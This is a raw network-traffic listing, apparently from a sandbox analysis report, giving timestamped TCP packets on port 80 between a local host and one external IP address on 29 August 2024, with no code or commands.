                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641153097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641163111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641172886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641180992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641184092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641196012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641197920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641222954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641237020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646697998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646708965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646718979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646755934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646794081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646806002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646815062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646833897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646840096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646852970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646859884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646864891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646876097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646881104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646887064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646892071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646899939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646908998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646910906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646924019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.646934986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646949053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.646977901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647119999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647138119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647154093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647160053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647176981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647197962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647229910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647242069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647252083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647264004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647273064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647295952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647319078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647614956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647661924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647670031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647681952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647713900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647727966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647738934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647747993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647758007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.647772074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647780895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.647809982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649157047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649178028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649189949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649205923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649215937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649234056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649245977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649271965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649292946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649322033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649333000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649364948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649756908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649804115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649821043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649863958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649939060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649950027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649960041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649970055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.649985075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.649992943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650005102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650012970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650015116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650027037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650052071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650101900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650113106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650122881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650146961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650156021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650168896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650180101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650197983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650201082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650216103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650223017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650228977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650237083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650239944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650252104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650260925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650266886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650274038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650285006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650285006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650295973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.650304079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650321960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.650341988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661324024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661360979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661389112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661401033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661428928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661470890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661503077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661514044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661524057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661547899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661559105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661569118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661570072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661580086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661595106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661602020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661623955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661657095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661668062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661678076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661689043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661698103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661700964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661711931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.661722898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661737919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.661760092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663165092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663177013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663187027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663214922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663239956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663258076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663269043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663285971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663294077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663311005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663311958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663321972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663326979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663345098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663346052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663360119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663364887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663373947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663379908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663387060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663394928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663398981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663409948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663410902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.663428068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.663445950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695452929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695463896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695468903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695518970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695529938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695539951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695542097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695552111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695566893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695617914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695632935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695643902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695667028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695677996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695687056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695697069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695713043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.695734024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.727231979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727242947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727252960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727379084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727389097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727391005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.727391005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.727400064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727417946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727428913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.727430105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.727456093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.727467060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733392000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733506918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733515978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733525991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733535051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733546972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733608961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733614922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733627081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733635902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733645916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733654976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733658075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733679056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733684063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733695030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733701944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733704090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733715057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733721972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733741045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733747005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733757019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733761072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733766079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733776093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733784914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733793974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733818054 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.733896971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733906984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733916044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.733953953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734175920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734186888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734204054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734220028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734230995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734230995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734230995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734255075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734361887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734374046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734407902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734693050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734713078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734724045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734734058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734735966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734746933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734757900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734771967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734781027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734785080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.734801054 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.734822989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736121893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736148119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736160040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736169100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736190081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736253023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736263990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736273050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736285925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736295938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736295938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736315012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736332893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736787081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736831903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736836910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736843109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736866951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736876011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736877918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736912966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.736985922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.736996889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737014055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737026930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737030983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737040043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737040043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737061977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737085104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737092018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737103939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737113953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737126112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737129927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737138987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737155914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737173080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737179041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737185955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737196922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737209082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737217903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737225056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737236023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737242937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737255096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.737257957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737287045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.737298012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748137951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748204947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748251915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748264074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748272896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748297930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748322010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748330116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748341084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748351097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748362064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748364925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748378038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748399973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748435020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748445988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748455048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748466969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748476982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748480082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748495102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.748498917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748517990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.748539925 CEST4973980192.168.2.4147.45.68.138
